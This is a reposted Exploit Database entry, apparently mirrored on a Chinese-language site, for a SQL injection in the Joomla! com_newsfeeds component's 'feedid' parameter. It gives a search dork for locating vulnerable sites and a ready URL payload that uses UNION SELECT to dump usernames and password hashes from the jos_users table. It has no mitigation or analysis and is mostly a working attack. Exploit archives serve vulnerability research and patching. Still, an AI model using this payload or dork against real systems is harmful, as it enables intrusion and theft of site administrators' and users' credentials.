Joomla! Component com_newsfeeds 1.0 – ‘feedid’ SQL Injection

• Exploit Database
• 16 阅读

• 作者： Milad karimi
  日期： 2020-03-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48202/

• # Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
  # Date: 2020-03-10
  # Author: Milad Karimi
  # Software Link:
  # Version:
  # Category : webapps
  # Tested on: windows 10 , firefox
  # CVE : CWE-89
  # Dork: inurl:index.php?option=com_newsfeeds
  
  
  index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
  
  Example:
  
  http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--